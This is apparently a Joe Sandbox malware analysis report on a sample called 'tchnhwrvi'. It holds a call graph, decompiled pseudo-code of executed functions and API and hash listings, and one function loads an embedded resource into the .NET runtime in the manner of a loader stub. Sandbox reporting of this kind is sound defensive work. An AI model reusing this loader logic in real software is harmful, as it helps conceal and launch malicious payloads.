28831->28818 28832 319940b 28832->28831 28833 3199610 GetModuleHandleW 28832->28833 28834 319963d 28833->28834 28834->28818 28835->28832 28836->28832 28838 3199671 28837->28838 28839 31996a9 28838->28839 28845 3198768 28838->28845 28839->28823 28842 3199664 28841->28842 28843 31996a9 28842->28843 28844 3198768 LoadLibraryExW 28842->28844 28843->28823 28844->28843 28847 3199850 LoadLibraryExW 28845->28847 28848 31998c9 28847->28848 28848->28839 28756 40171a 28757 401726 ___scrt_is_nonwritable_in_current_image 28756->28757 28782 401992 28757->28782 28759 40172d 28760 401880 28759->28760 28770 401757 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 28759->28770 28801 401c83 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _com_raise_error 28760->28801 28762 401887 28802 40506f 21 API calls CallUnexpected 28762->28802 28764 40188d 28803 405033 21 API calls CallUnexpected 28764->28803 28766 401895 28767 401776 28769 4017fd 28794 40147b GetModuleHandleW FindResourceW 28769->28794 28770->28767 28773 4017f7 28770->28773 28800 405049 41 API calls 4 library calls 28770->28800 28790 401d9e 28773->28790 28783 40199b 28782->28783 28804 40207b IsProcessorFeaturePresent 28783->28804 28785 4019a7 28805 4025ca 10 API calls 2 library calls 28785->28805 28787 4019ac 28788 4019b0 28787->28788 28806 4025e9 7 API calls 2 library calls 28787->28806 28788->28759 28807 402470 28790->28807 28792 401db1 GetStartupInfoW 28793 401dc4 28792->28793 28793->28769 28795 40149d GetModuleHandleW LoadResource 28794->28795 28796 4014de ExitProcess 28794->28796 28797 4014d7 FreeResource 28795->28797 28798 4014af LockResource GetModuleHandleW SizeofResource 28795->28798 28797->28796 28798->28797 28799 4014cc 28798->28799 28799->28797 28800->28773 28801->28762 28802->28764 28803->28766 28804->28785 28805->28787 28806->28788 28807->28792

                    Executed Functions

                    Function 0040147B Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E0040147B() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                    0x00401491
                    0x00401497
                    0x0040149b
                    0x004014de
                    0x004014e0
                    0x004014e0
                    0x004014a9
                    0x004014ad
                    0x004014b9
                    0x004014bf
                    0x004014c5
                    0x004014ca
                    0x004014d2
                    0x004014d2
                    0x004014ca
                    0x004014d8
                    0x00000000

                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                    • FindResourceW.KERNEL32(00000000,?,?,80004003), ref: 00401491
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                    • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                    • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                    • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                      • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                    • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                    • ExitProcess.KERNEL32 ref: 004014E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                    • String ID: v4.0.30319
                    • API String ID: 2372384083-3152434051
                    • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                    • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                    • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                    • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401E16 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401E16() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
				return _t1;
			}




                    0x00401e1b
                    0x00401e21

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001E22,0040170D), ref: 00401E1B
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                    • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                    • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319B6C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 0319B730
                    • GetCurrentThread.KERNEL32 ref: 0319B76D
                    • GetCurrentProcess.KERNEL32 ref: 0319B7AA
                    • GetCurrentThreadId.KERNEL32 ref: 0319B803
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: c6eb666671e1d7cb003551e3076d4493869ab00cc8bb67d4f38de81ce5f4d4a6
                    • Instruction ID: 169960ce97741599e2be112909e997c2a1105bf503ab46c09e5dfdf3f88caca6
                    • Opcode Fuzzy Hash: c6eb666671e1d7cb003551e3076d4493869ab00cc8bb67d4f38de81ce5f4d4a6
                    • Instruction Fuzzy Hash: 945184B49003488FEB14CFAAD988B9EBFF5AF48314F24855AE009B7390D7386844CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319B6D0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 0319B730
                    • GetCurrentThread.KERNEL32 ref: 0319B76D
                    • GetCurrentProcess.KERNEL32 ref: 0319B7AA
                    • GetCurrentThreadId.KERNEL32 ref: 0319B803
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Current$ProcessThread
                    • String ID:
                    • API String ID: 2063062207-0
                    • Opcode ID: 4ee8a08dc0d6fd50a8c1eb649c81e5d54ddb2330d78bc3e5ee36ee359dda47a3
                    • Instruction ID: 444e3cd085f91aca5ca4a6ccd87c4d5c657ab2dc33c5a9fc9a639bc8282bf578
                    • Opcode Fuzzy Hash: 4ee8a08dc0d6fd50a8c1eb649c81e5d54ddb2330d78bc3e5ee36ee359dda47a3
                    • Instruction Fuzzy Hash: E65153B49006088FDB14CFAAD988B9EBBF5AF48304F24855AE019B7390D7386884CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407507 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E00407507() {
				WCHAR* _t1;
				void* _t3;
				void* _t17;
				WCHAR* _t19;

				_t1 = GetEnvironmentStringsW();
				_t19 = _t1;
				if(_t19 != 0) {
					_t11 = E004074D0(_t19) - _t19 & 0xfffffffe;
					_t3 = E00407D48(E004074D0(_t19) - _t19 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E00403120(_t17, _t19, _t11);
					}
					E0040650B(0);
					FreeEnvironmentStringsW(_t19);
					return _t17;
				} else {
					return _t1;
				}
			}







                    0x0040750a
                    0x00407510
                    0x00407514
                    0x00407524
                    0x00407528
                    0x0040752d
                    0x00407533
                    0x00407538
                    0x0040753d
                    0x00407542
                    0x00407549
                    0x00407554
                    0x00407517
                    0x00407517
                    0x00407517

                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free
                    • String ID:
                    • API String ID: 3328510275-0
                    • Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                    • Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
                    • Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
                    • Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 031993E8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 64 31993e8-31993fd call 3198704 68 31993ff-3199400 64->68 69 3199413-3199417 64->69 121 3199405 call 3199670 68->121 122 3199405 call 3199660 68->122 71 3199419-3199423 69->71 72 319942b-319946c 69->72 71->72 76 3199479-3199487 72->76 77 319946e-3199476 72->77 74 319940b-319940d 74->69 78 3199548-31995c2 74->78 79 3199489-319948e 76->79 80 31994ab-31994ad 76->80 77->76 114 31995c9-3199608 78->114 115 31995c4-31995c7 78->115 82 3199499 79->82 83 3199490-3199497 call 3198710 79->83 81 31994b0-31994b7 80->81 87 31994b9-31994c1 81->87 88 31994c4-31994cb 81->88 85 319949b-31994a9 82->85 83->85 85->81 87->88 91 31994d8-31994e1 call 3198720 88->91 92 31994cd-31994d5 88->92 96 31994ee-31994f3 91->96 97 31994e3-31994eb 91->97 92->91 98 3199511-3199515 96->98 99 31994f5-31994fc 96->99 97->96 104 319951b-319951e 98->104 99->98 101 31994fe-319950e call 3198730 call 3198740 99->101 101->98 106 3199541-3199547 104->106 107 3199520-319953e 104->107 107->106 116 319960a-319960d 114->116 117 3199610-319963b GetModuleHandleW 114->117 115->114 116->117 118 319963d-3199643 117->118 119 3199644-3199658 117->119 118->119 121->74 122->74
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0319962E
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: c7e2376147e11b091556d0de6c6e31b2502a81b8955c54852399cdd89a232aa0
                    • Instruction ID: a9693bf8fad3026ef6a4e715b458f31625ad1c1a7df86f6d971150efd888f0f0
                    • Opcode Fuzzy Hash: c7e2376147e11b091556d0de6c6e31b2502a81b8955c54852399cdd89a232aa0
                    • Instruction Fuzzy Hash: 227134B0A00B058FEB64DF6AC55076ABBF5BF88310F14892ED44ADBB40DB74E845CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319FBEF Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 123 319fbef-319fbf6 124 319fbf8-319fbfc 123->124 125 319fbfd-319fc5e 123->125 124->125 126 319fc69-319fc70 125->126 127 319fc60-319fc66 125->127 128 319fc7b-319fcb3 126->128 129 319fc72-319fc78 126->129 127->126 130 319fcbb-319fd1a CreateWindowExW 128->130 129->128 131 319fd1c-319fd22 130->131 132 319fd23-319fd5b 130->132 131->132 136 319fd68 132->136 137 319fd5d-319fd60 132->137 138 319fd69 136->138 137->136 138->138
                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0319FD0A
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateWindow
                    • String ID:
                    • API String ID: 716092398-0
                    • Opcode ID: 8513ffb58e0b88229f194b353f33ee7dba47cfffdcb1eacc8e24dab4e4212ad7
                    • Instruction ID: 10e67a6b74d5dd10eece7f985380a37be17d1eedde84b473ef1c69bb3814c0cc
                    • Opcode Fuzzy Hash: 8513ffb58e0b88229f194b353f33ee7dba47cfffdcb1eacc8e24dab4e4212ad7
                    • Instruction Fuzzy Hash: FD51A0B1D00349AFDF14CFA9C884ADEBBB5BF48314F24812AE819AB210D7759945CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319FBF8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 139 319fbf8-319fc5e 141 319fc69-319fc70 139->141 142 319fc60-319fc66 139->142 143 319fc7b-319fd1a CreateWindowExW 141->143 144 319fc72-319fc78 141->144 142->141 146 319fd1c-319fd22 143->146 147 319fd23-319fd5b 143->147 144->143 146->147 151 319fd68 147->151 152 319fd5d-319fd60 147->152 153 319fd69 151->153 152->151 153->153
                    APIs
                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0319FD0A
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CreateWindow
                    • String ID:
                    • API String ID: 716092398-0
                    • Opcode ID: 0a683b2ccdb90914ebeb9b55947d52a51514b76d4b8f749fb8a95713790e97c5
                    • Instruction ID: aabb91dcbf84d11bd97dae0805955d22890b92cefd185136d5b65eb74adbf1ce
                    • Opcode Fuzzy Hash: 0a683b2ccdb90914ebeb9b55947d52a51514b76d4b8f749fb8a95713790e97c5
                    • Instruction Fuzzy Hash: 434191B1D00349AFDF14CFA9C884ADEFBB5BF48314F24812AE819AB250D7749945CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 07673F60 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 154 7673f60-767694f 156 7676951-767695b 154->156 157 7676988-76769d2 LoadLibraryA 154->157 156->157 158 767695d-767695f 156->158 162 76769d4-76769da 157->162 163 76769db-7676a0c 157->163 160 7676982-7676985 158->160 161 7676961-767696b 158->161 160->157 164 767696f-767697e 161->164 165 767696d 161->165 162->163 169 7676a0e-7676a12 163->169 170 7676a1c 163->170 164->164 166 7676980 164->166 165->164 166->160 169->170 171 7676a14 169->171 171->170
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.571984885.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: true
                    • Associated: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7660000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 165a39dc6649fbc248414eea5843989312f50fb5ff38d402ea717ed611f3970b
                    • Instruction ID: cfea6763d7e82808e81f9d493bfe51d26644d7786c42cfae499aec29aedc5491
                    • Opcode Fuzzy Hash: 165a39dc6649fbc248414eea5843989312f50fb5ff38d402ea717ed611f3970b
                    • Instruction Fuzzy Hash: 213136F0D0065A9FCB14CFA9C48479EBBB1EF08354F148529E816B7340D7749845CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319BCF8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 172 319bcf8-319bcfa 173 319bcfc-319bcfe 172->173 174 319bd01-319bd04 172->174 175 319bd00 173->175 176 319bd05-319bd94 DuplicateHandle 173->176 174->176 175->174 177 319bd9d-319bdba 176->177 178 319bd96-319bd9c 176->178 178->177
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319BD87
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 95d7ed8e6c95f18cfe69ac4db1f4b7d7a3d0bab543e23c5efd75e44af4f0c81e
                    • Instruction ID: 3c89064815c4e1f6e247c2ff8d2f6f8b634e11dfb0f86b475569909a258c908d
                    • Opcode Fuzzy Hash: 95d7ed8e6c95f18cfe69ac4db1f4b7d7a3d0bab543e23c5efd75e44af4f0c81e
                    • Instruction Fuzzy Hash: DE21E7B59002489FDF10CFAAD984ADEFBF9EB48314F14801AE954B3210D374A945CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319BD00 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 181 319bd00-319bd94 DuplicateHandle 184 319bd9d-319bdba 181->184 185 319bd96-319bd9c 181->185 185->184
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0319BD87
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 1c88ac7ca892dcf848983d130decf481ee4d4a9fd3f45e4c8202ec437f9a226b
                    • Instruction ID: 94d43abf0c9bf5ccd6dece2400a275d06015cc2a0f8e5930a138ae8825ff48c5
                    • Opcode Fuzzy Hash: 1c88ac7ca892dcf848983d130decf481ee4d4a9fd3f45e4c8202ec437f9a226b
                    • Instruction Fuzzy Hash: 2E21C4B59002589FDB10CFAAD984ADEFFF9EB48314F14841AE958B3310D378A944CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03199849 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 188 3199849-319984a 189 319984c-319984e 188->189 190 3199851-3199854 188->190 191 3199855-3199890 189->191 195 3199850 189->195 190->191 193 3199898-31998c7 LoadLibraryExW 191->193 194 3199892-3199895 191->194 196 31998c9-31998cf 193->196 197 31998d0-31998ed 193->197 194->193 195->190 196->197
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031996A9,00000800,00000000,00000000), ref: 031998BA
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: f778156e7891fcf63b90358056c2b35da3e5ef0baa6276c3f1c25d1261b0a977
                    • Instruction ID: a5ab8edae2dadc2023e0a9aa0e152550d1de8483eee7700eadbed0421c9e7de7
                    • Opcode Fuzzy Hash: f778156e7891fcf63b90358056c2b35da3e5ef0baa6276c3f1c25d1261b0a977
                    • Instruction Fuzzy Hash: AB21F2B68002498BEF10CFAAC484ADEFBF8EB48310F14846EE419B7600C378A545CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03198768 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 207 3198768-3199890 211 3199898-31998c7 LoadLibraryExW 207->211 212 3199892-3199895 207->212 213 31998c9-31998cf 211->213 214 31998d0-31998ed 211->214 212->211 213->214
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,031996A9,00000800,00000000,00000000), ref: 031998BA
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 737acf2403bd05c495f6e9da976431137530d30d1dc828e1b4054e2a4e0ce732
                    • Instruction ID: 20da62e769da8c55b05774074ec8d0fd7d33733012da88a1c7f5517310bbb0fe
                    • Opcode Fuzzy Hash: 737acf2403bd05c495f6e9da976431137530d30d1dc828e1b4054e2a4e0ce732
                    • Instruction Fuzzy Hash: FE1114B6D002098FDB10CF9AC484ADEFBF8EB48310F14846EE819B7600C375A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03197EE9 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 200 3197ee9-3197f44 202 3197f92-3197fab 200->202 203 3197f46-3197f6e KiUserCallbackDispatcher 200->203 204 3197f70-3197f76 203->204 205 3197f77-3197f8b 203->205 204->205 205->202
                    APIs
                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 03197F5D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CallbackDispatcherUser
                    • String ID:
                    • API String ID: 2492992576-0
                    • Opcode ID: 1bbba7c4fd4eb5546b502648b0b44db552135e3f5118dfe02d66ec245c5ce039
                    • Instruction ID: 7c7ec8de291d9c3aeddafcab5719137d9841c90d7619bb6ed1e14fcdb4c921f0
                    • Opcode Fuzzy Hash: 1bbba7c4fd4eb5546b502648b0b44db552135e3f5118dfe02d66ec245c5ce039
                    • Instruction Fuzzy Hash: C621A2758043988FDB11DFA5D4443DABFF8AF1A314F18809ED894B7241C7789648CBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319FEF0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 217 319fef0-319fefc 218 319fe99-319feaa SetWindowLongW 217->218 219 319feff-319ff40 217->219 220 319feac-319feb2 218->220 221 319feb3-319fec7 218->221 227 319ff4e-319ff55 219->227 228 319ff42-319ff44 219->228 220->221 228->227
                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: fa31ea5524a751377b9d9ccbd097d8f361b7d49dcea9a3f5334d10cff15c9bed
                    • Instruction ID: 6712c40e5c3139e330669f5767d61d9f3b12148941cc8c70511b131edb6df9cd
                    • Opcode Fuzzy Hash: fa31ea5524a751377b9d9ccbd097d8f361b7d49dcea9a3f5334d10cff15c9bed
                    • Instruction Fuzzy Hash: 5D01BD3A6002549FC32297ADE8083EEBFE9AF89222F2440DBE445E7781C7740909C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 031995C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 229 31995c8-3199608 231 319960a-319960d 229->231 232 3199610-319963b GetModuleHandleW 229->232 231->232 233 319963d-3199643 232->233 234 3199644-3199658 232->234 233->234
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0319962E
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 911882ad2afc6f9e1dcc40b9b581c4e25ee5c431f611ff5c764c4f6aa5968692
                    • Instruction ID: ec5ee9bf9a32e7a962f6d397886a75caa2ac8927befb04b9b7dbe42b66cf7e59
                    • Opcode Fuzzy Hash: 911882ad2afc6f9e1dcc40b9b581c4e25ee5c431f611ff5c764c4f6aa5968692
                    • Instruction Fuzzy Hash: B111E3B5C006498FDB10CF9AC444ADEFBF4EF48314F14851AD819B7600D378A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319FE38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: 94881425c9b3250c3766231da063c55eb4b66063f4e5d56f77f29b877563bfb3
                    • Instruction ID: 4cc5af12b9d306da2aeb595a0d1d74211d148602bc0d54160fda880b9d47fc58
                    • Opcode Fuzzy Hash: 94881425c9b3250c3766231da063c55eb4b66063f4e5d56f77f29b877563bfb3
                    • Instruction Fuzzy Hash: FE1125B58006089FDB10CF9AD584BDEBBF8EB48324F20845AE818B7601C374A945CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0319FE40 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowLongW.USER32(?,?,?), ref: 0319FE9D
                    Memory Dump Source
                    • Source File: 00000002.00000002.565470825.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3190000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LongWindow
                    • String ID:
                    • API String ID: 1378638983-0
                    • Opcode ID: 759909fbf5b2ee03936ceba5836906211244257520f41617f7c456afafb9ffa8
                    • Instruction ID: 80c6af10788a86939e3c5e53c0c1f23d3cbc76d5d7649ebf24786e4d255f466b
                    • Opcode Fuzzy Hash: 759909fbf5b2ee03936ceba5836906211244257520f41617f7c456afafb9ffa8
                    • Instruction Fuzzy Hash: 3411D3B58006499FDB10CF9AD584BDEFBF8EB48324F20855AE959B7640C374A944CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407D48 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407D48(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0040649B())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4163ec, 0, _t8); // executed
